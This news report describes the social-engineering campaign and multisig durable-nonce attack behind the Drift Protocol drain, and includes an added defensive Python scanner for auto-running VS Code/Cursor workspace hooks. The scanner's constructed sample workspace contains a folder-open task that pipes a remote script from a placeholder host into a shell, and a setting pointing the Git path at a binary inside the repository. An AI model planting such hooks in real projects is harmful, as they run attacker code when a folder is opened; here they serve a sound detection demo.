A six-month intelligence operation preceded the $270 million exploit of Drift Protocol and was carried out by a North Korean state-linked group, according to a detailed incident update the team released earlier on Sunday.
The attackers first made contact around the fall of 2025 at a major crypto conference, presenting themselves as a quantitative trading firm looking to integrate with Drift.
They were technically fluent, had verifiable professional backgrounds and understood how the protocol worked, Drift said. A Telegram group was set up, and months of substantive conversations about trading strategies and vault integrations followed, the kind of interaction that is standard when a trading firm onboards onto a DeFi protocol.
Between December 2025 and January 2026, the group onboarded an Ecosystem Vault on Drift, held several working sessions with contributors, deployed more than $1 million of its own capital and built a working operational presence inside the ecosystem.
Drift contributors met members of the group face-to-face at major industry conferences in multiple countries through February and March. By the time the attack began on April 1, the relationship was almost half a year old.
The compromise appears to have come through two vectors.
Another downloaded a TestFlight application, which the group presented as their wallet product. TestFlight is Apple's platform for distributing pre-release apps, and builds shipped through it do not go through the full App Store review.
For the editor-based vector, Drift pointed to a known vulnerability in VSCode and Cursor, two of the most widely used code editors, that the security community had flagged since late 2025: simply opening a file or folder in the editor was enough to silently execute arbitrary code, with no prompt or warning.
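A pre-open gate for this class of editor hook, added here as an example and not code from Drift or CoinDesk. Before a folder is opened on a machine that holds signing keys, the script reads the workspace's `.vscode/tasks.json` and `.vscode/settings.json` the way the editor does (JSON with comments and trailing commas) and flags tasks configured to run on folder open and settings that point the editor at an executable. The list of settings keys is an assumption and deliberately short; the sample workspace files are constructed for the demo. It does not detect editor bugs, only configuration a trusted workspace would act on, so it complements keeping Workspace Trust enabled rather than replacing it.

```python
"""Scan a folder for VS Code / Cursor auto-executing workspace hooks before opening it.

Added example (not Drift's or CoinDesk's code). Checks two things an editor
acts on as soon as a folder is opened:
  * .vscode/tasks.json tasks whose runOptions.runOn is "folderOpen";
  * .vscode/settings.json keys that select a program path the editor or a
    bundled extension will execute (assumed, non-exhaustive key list).
"""
import json
import os
import re
import tempfile

# Settings keys naming an executable or code directory the editor will load.
# Assumed list: extend it for the extensions installed on the signer machine.
EXECUTABLE_SETTINGS = {"git.path", "python.defaultInterpreterPath", "typescript.tsdk", "eslint.nodePath"}
EXECUTABLE_PREFIXES = ("terminal.integrated.profiles.", "terminal.integrated.automationProfile.")


def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments outside string literals, then trailing commas.

    The editor parses these files as JSON-with-comments; json.loads does not.
    A comma before } or ] inside a string would also be stripped (known limit).
    """
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped characters verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def load_jsonc(text: str) -> dict:
    """Parse JSON-with-comments the way the editor does."""
    return json.loads(strip_jsonc(text))


def _read(path: str):
    if not os.path.isfile(path):
        return None
    with open(path, encoding="utf-8") as fh:
        return load_jsonc(fh.read())


def scan_workspace(root: str) -> list[str]:
    """Return findings for configuration under root/.vscode that runs code on open."""
    findings = []
    vscode = os.path.join(root, ".vscode")
    tasks = _read(os.path.join(vscode, "tasks.json"))
    if tasks:
        for task in tasks.get("tasks", []):
            if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
                findings.append(
                    f"tasks.json: task {task.get('label')!r} runs on folder open: {task.get('command')!r}"
                )
    settings = _read(os.path.join(vscode, "settings.json"))
    if settings:
        for key, value in settings.items():
            if key in EXECUTABLE_SETTINGS or key.startswith(EXECUTABLE_PREFIXES):
                findings.append(f"settings.json: {key} = {value!r} selects a program the editor will execute")
    return findings


# Constructed sample workspace files (not taken from any real repository).
SAMPLE_TASKS = """{
  // constructed sample: one task is wired to the folderOpen auto-run feature
  "version": "2.0.0",
  "tasks": [
    {
      "label": "bootstrap",
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" },
    },
    { "label": "test", "type": "shell", "command": "npm test" }
  ]
}
"""

SAMPLE_SETTINGS = """{
  /* constructed sample: points the Git extension at a binary shipped inside the repo */
  "editor.formatOnSave": true,
  "git.path": "${workspaceFolder}/.tools/git"  // invoked when the editor looks for repositories
}
"""


def build_sample(root: str) -> None:
    """Write the constructed sample workspace under root."""
    vscode = os.path.join(root, ".vscode")
    os.makedirs(vscode, exist_ok=True)
    with open(os.path.join(vscode, "tasks.json"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_TASKS)
    with open(os.path.join(vscode, "settings.json"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_SETTINGS)


def demo() -> list[str]:
    """Build the sample in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        return scan_workspace(root)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Run it against a cloned repository before opening that repository in the editor; any finding should be treated as a reason not to open the folder on a signer device at all, rather than something to review inside the editor.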
Once the devices were compromised, the attackers had what they needed to obtain the two multisig credentials that enabled the durable nonce attack CoinDesk described earlier this week. A Solana transaction normally expires within about a minute because it references a recent blockhash; a durable nonce replaces that blockhash with a value stored in a nonce account, so a signed transaction stays valid until the nonce is advanced. These pre-signed transactions sat dormant for more than a week before being executed on April 1, draining $270 million from the protocol's vaults in under a minute.
The attribution points to UNC4736, a North Korean state-affiliated group also tracked as AppleJeus or Citrine Sleet, based on both on-chain fund flows tracing back to the Radiant Capital attackers and operational overlap with known DPRK-linked personas.
However, the individuals who appeared in person at conferences were not North Korean citizens. DPRK threat actors at this level are known to deploy third-party intermediaries with fully constructed identities, employment histories, and professional networks built to withstand due diligence.
Drift encouraged other protocols to revise access control and treat any device touching a multisig as a potential target. The broader implication is uncomfortable for an industry that relies on multisig management as its primary security model.
But if attackers are willing to spend six months and a million dollars building a legitimate-looking presence in an ecosystem, meeting teams in person, contributing real capital and waiting, the question is which security model is designed to catch that.